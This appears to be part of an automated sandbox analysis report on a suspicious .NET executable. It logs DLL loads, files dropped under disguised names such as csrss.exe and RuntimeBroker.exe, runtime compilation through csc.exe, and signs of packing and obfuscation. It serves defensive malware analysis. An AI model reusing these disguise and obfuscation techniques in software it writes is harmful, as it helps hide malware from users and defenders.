                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: apphelp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: dnsapi.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeSection loaded: sspicli.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: mscoree.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: version.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: wldp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: profapi.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exeJump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeDirectory created: C:\Program Files\Windows Portable Devices\b4601131bf8590Jump to behavior
                              Source: 4ra1Fo2Zql.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                              Source: 4ra1Fo2Zql.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                              Source: 4ra1Fo2Zql.exeStatic file information: File size 1959424 > 1048576
                              Source: 4ra1Fo2Zql.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x1dde00
                              Source: 4ra1Fo2Zql.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: \System.pdb source: GrVEPTmsoNTbY.exe, 0000000A.00000002.2199358921.000000001B952000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: 8C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.pdb source: 4ra1Fo2Zql.exe, 00000000.00000002.2060132531.0000000002A6C000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              .NET source code contains method to dynamically call methods (often used by packers)
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.cs.Net Code: Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777245)),Type.GetTypeFromHandle(jBVrEh6dwsCwn1TMD7p.njIvGwSeUaf(16777259))})
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\q4lxag2s\q4lxag2s.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00tp5zly\00tp5zly.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E64B91 push eax; retf 0_2_00007FF848E64B97
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E64790 push esp; iretd 0_2_00007FF848E64793
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848E61C9F push FFFFFFBEh; ret 0_2_00007FF848E61CA1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF848FC25D4 push esi; ret 0_2_00007FF848FC25DF
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 0_2_00007FF84925D1FC push edi; ret 0_2_00007FF84925D1FE
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848E84B91 push eax; retf 10_2_00007FF848E84B97
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848E84790 push esp; iretd 10_2_00007FF848E84793
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848E81C9F push FFFFFFBEh; ret 10_2_00007FF848E81CA1
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 10_2_00007FF848FE25D4 push esi; ret 10_2_00007FF848FE25DF
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E960B8 push edx; retf 11_2_00007FF848E960BB
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E95CBA push eax; iretd 11_2_00007FF848E95CBD
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E798E0 push 8B48FFFFh; iretd 11_2_00007FF848E798E5
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E78426 push ds; iretd 11_2_00007FF848E78427
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E64B91 push eax; retf 11_2_00007FF848E64B97
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E64790 push esp; iretd 11_2_00007FF848E64793
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E600BD pushad ; iretd 11_2_00007FF848E600C1
                              Source: C:\Program Files (x86)\Google\GrVEPTmsoNTbY.exeCode function: 11_2_00007FF848E61C9F push FFFFFFBEh; ret 11_2_00007FF848E61CA1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 28_2_00007FF848E54790 push esp; iretd 28_2_00007FF848E54793
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 28_2_00007FF848E54B91 push eax; retf 28_2_00007FF848E54B97
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 28_2_00007FF848E51C9F push FFFFFFBEh; ret 28_2_00007FF848E51CA1
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 31_2_00007FF848E94790 push esp; iretd 31_2_00007FF848E94793
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 31_2_00007FF848E94B91 push eax; retf 31_2_00007FF848E94B97
                              Source: C:\Users\user\Desktop\4ra1Fo2Zql.exeCode function: 31_2_00007FF848E91C9F push FFFFFFBEh; ret 31_2_00007FF848E91CA1
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E698E0 push 8B48FFFFh; iretd 32_2_00007FF848E698E5
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E68426 push ds; iretd 32_2_00007FF848E68427
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E85CBA push eax; iretd 32_2_00007FF848E85CBD
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E860B8 push edx; retf 32_2_00007FF848E860BB
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E54790 push esp; iretd 32_2_00007FF848E54793
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E54B91 push eax; retf 32_2_00007FF848E54B97
                              Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exeCode function: 32_2_00007FF848E51C9F push FFFFFFBEh; ret 32_2_00007FF848E51CA1
                              Source: 4ra1Fo2Zql.exeStatic PE information: section name: .text entropy: 7.554685403500024
                              Source: RuntimeBroker.exe.0.drStatic PE information: section name: .text entropy: 7.554685403500024
                              Source: GrVEPTmsoNTbY.exe.0.drStatic PE information: section name: .text entropy: 7.554685403500024
                              Source: csrss.exe.0.drStatic PE information: section name: .text entropy: 7.554685403500024
                              Source: GrVEPTmsoNTbY.exe0.0.drStatic PE information: section name: .text entropy: 7.554685403500024
                              Source: 4ra1Fo2Zql.exe, ex6u5CrEHFnwWAeLDl.csHigh entropy of concatenated method names: 'jTUlnAwZw', 'vXV3I3cPfubGLex0LY9I', 'eqxB2ocPF0UNM9kR7vnk', 'yZ0emHcPp5YI9Gjy8Cqt', 'MMsXbKcPlHvsuQ08rfgU', 'yXw4QDWG9', 'dRQ0U2hbn', 'opPUY6f0S', 'bLOIhOZHt', 'bAXoiLxSA'
                              Source: 4ra1Fo2Zql.exe, D1FlRoDqcSARSOZbnHB.csHigh entropy of concatenated method names: 'LH0DNpi0OT', 'wpl8fdcRadw4COXsxnuK', 'wcqgGHcR4E5UMJVgGupE', 'SvIBEVcR0tM8bs5p0Q4Q', 'P9X', 'vmethod_0', 'OSucCKDAZ1R', 'imethod_0', 'OerX3RcRW6qjVLu0VrrU', 'dhG7DXcRePJxCmdIc600'
                              Source: 4ra1Fo2Zql.exe, nABh0Kys1MN46ZffL5J.csHigh entropy of concatenated method names: 'AjGtDpckSwgdICKMH3ci', 'cA5XYwckqc9FTZOjVOQt', 'ulTPQBckJKmf6j91WeId', 'Hba50pckVqVcUINrpbxA', 'H7jdAxedVd', 'aZuF4BckYGZtoGOJnv0U', 'lg5ghsckwi7kWkd1NZ1W', 'u7dCkVckxr7Q6oJ9RosS', 'IXy6JLckOR53rZIX1OhW', 'tR2QAfckNSnll0dVyJCf'
                              Source: 4ra1Fo2Zql.exe, UqUu7p6aIXKD1Jfyfpd.csHigh entropy of concatenated method names: 'omG6nafVoJ', 'BHS6Bfoni8', 'wHe6FMXsVw', 'Dgd6pmFCp8', 'mD26f7r79N', 'McE6lS3ThH', 'faL6RlJcUM', 'kN0683phGP', 'edC6krdgt3', 'sau6b1MxUP'
                              Source: 4ra1Fo2Zql.exe, LgJrts62MAVfKLajc7D.csHigh entropy of concatenated method names: 'FTjc5pmK0q4', 'KHWc5fOv9YL', 'D9ac5lebFQc', 'rjAc5RQc5QP', 'lumc58aM0gn', 'apOc5kfB485', 'hRlc5bcQixZ', 'qO1AGrEADa', 'VOYc52bFKR7', 'Sf1c5mIg8ae'
                              Source: 4ra1Fo2Zql.exe, K4Kx3sNmFb8h7ZRAOdA.csHigh entropy of concatenated method names: 'method_0', 'method_1', 'knJN9CK56r', 'tcqNElYWFc', 'hsQNT2CQAE', 'Dispose', 'Af3XP7cguYf9AWumsLBy', 'MO271Icg9U1aFLQYi5ua', 'fQFYM2cgEvwaTpWZSBFP', 'U855KxcgT2QgBDlCVWZs'
                              Source: 4ra1Fo2Zql.exe, tUhWhiFDEretVj0VSwR.csHigh entropy of concatenated method names: 'GH3F78FRrT', 'XVnFQXvaO2', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'O1rFhxv1ql', 'method_2', 'uc7'
                              Source: 4ra1Fo2Zql.exe, M70500G29FF1KspfaIr.csHigh entropy of concatenated method names: 'q64', 'P9X', 'iiUcCdUwcsD', 'vmethod_0', 'hPAcD5aD5Wp', 'imethod_0', 'yHKRJMcFtq8P2W8BVEgY', 'Bg0fyWcFgOCs1RWKOJsC', 'LAh40icF6GtJMUJpbUnL', 'q4xqrlcFA10ZYwr8bpGP'
                              Source: 4ra1Fo2Zql.exe, YJ0nwytrtfFSElJEkGn.csHigh entropy of concatenated method names: 'Eh3wu6c6U2NXq3OH0i04', 'fsRJyZc6ItU940W7BfI9', 'iROgYC8i59', 'ASsjpwc6MWdk3p6HHEbv', 'bdhie2c6PnqV6FrbVi7p', 'P3jnghc6K5bFUJEwqlAs', 'f8sAnKc63W3L8g2L6WE2', 'JQFE5Kc6nvBbLBsgyKZU', 'Y6EiaLc6BZQFVH5oY9tO', 'InpuMhc6FW7ZxuJiQ7HQ'
                              Source: 4ra1Fo2Zql.exe, XBqvsHCMnuXoWheSita.csHigh entropy of concatenated method names: 'VZq', 'KZ3', 'XA4', 'imethod_0', 'e23', 'RRxcD1mn3ir', 'vnWcCcgqcIs', 'wYUONtcBPTryoXA4XPpk', 'MG5652cBKBGRKij6RI8B', 'Nd5nMXcB3VUeUGo2KNjM'
                              Source: 4ra1Fo2Zql.exe, KZdqMw5l3AoIJlrSqTl.csHigh entropy of concatenated method names: 'P83', 'KZ3', 'TH7', 'imethod_0', 'vmethod_0', 'Oc2cD7Kxfw7', 'vnWcCcgqcIs', 'V6rTBpcpSBM3GicUUf7x', 'GpBtvYcpVQ21VE8G7Dhj', 'zara7OcpH8rnoKGGo9ra'
                              Source: 4ra1Fo2Zql.exe, avLbHS1Pps7sMlPbrMt.csHigh entropy of concatenated method names: 'Vkr19Jl9N6', 'Wmy1EYb8jy', 'IIf1TF1Glr', 'OUd3NxcnEPfOqxscLIY3', 'z6rWVNcnTeDH6NehStYn', 'sFMiUPcnuAqBuB6nnwOQ', 'eqdDXrcn9uUEswNu8gqK', 'Fh913Ojdev', 'dyi1neItpN', 'B6N1Bo1xfE'
                              Source: 4ra1Fo2Zql.exe, m2qHExicItpUidZ31pB.csHigh entropy of concatenated method names: 'lyPi1ZYANh', 'q1oiCf1XUp', 'kMMiGXUIG6', 'xI53dlcfhOVvcL3VByru', 'KB1GTccfZxEagedTYhAO', 'sGt7HocfdvUJPLFx10TO', 'g0AmpQcfWPHh8p5H8VwN', 'o4gqbucfeL6FH2HfR1Xy', 's5uXT0cfL4A56oM405ZH'
                              Source: 4ra1Fo2Zql.exe, uXTmSC0NO2d5jpYm1pJ.csHigh entropy of concatenated method names: 'w52', 'o38', 'vmethod_0', 'H5J0gnOfM9', 'IUscDahP1uZ', 'h6WifOcuTMPZ0SB9depL', 'r0PZWtcu9Z7rkbhje4Wg', 'DfDIN9cuEgjBoDsQ0HnS', 'ehpEWucuqRAXdpRkmJck', 'ACfYhJcuJLBfTMj9urRR'
                              Source: 4ra1Fo2Zql.exe, XXDe8xIZBsdu6ciAJDW.csHigh entropy of concatenated method names: 'wBKscWJJoW', 'zArn7QcE2dnrwWJpiibw', 'AmEBQAcEkjLrG3x0KTaq', 'Fqx8ticEbe51f48CFaUt', 'LxD0AAcEmrI71ykWUT88', 'k7pIW200hS', 'kUSIe7Is3q', 'J6hILAM4Pv', 'jw0IrCiS7x', 'E5HIaoxP3K'
                              Source: 4ra1Fo2Zql.exe, VMIFqTiZm5Ky6nXBIYi.csHigh entropy of concatenated method names: 'P9X', 'W8rcCogNp6l', 'vmethod_0', 'imethod_0', 'MEaSN8cf3jXn6iY0LU06', 'UibaqUcfnhSukndYAQPB', 'sFFweOcfPokZxX2C4jcF', 'OVxsXycfKc1xyAOFEcMq', 'WJMS2TcfBGSTpk1O2qy6', 'TEfpiwcfFAIoBA2xDCmO'
                              Source: 4ra1Fo2Zql.exe, hlPwhFYkPiwtLDfVFrT.csHigh entropy of concatenated method names: 'OMtcDPW7IY7', 'Brwc5MeUBJ0', 'hKZOA0ct36efE9Iq7Ylk', 'Gt8GyCctPfryg9lvcGS8', 'lZrEO8ctKpTHVOhfdXGR', 'La44Rfctnyi2F8MuLn6G', 'NuR0rvctfCQLoi0fDuP9', 'FiDg1MctFhCRsjfqKUrg', 'mtejcjctp5Z9eQwh6vU5', 'imethod_0'
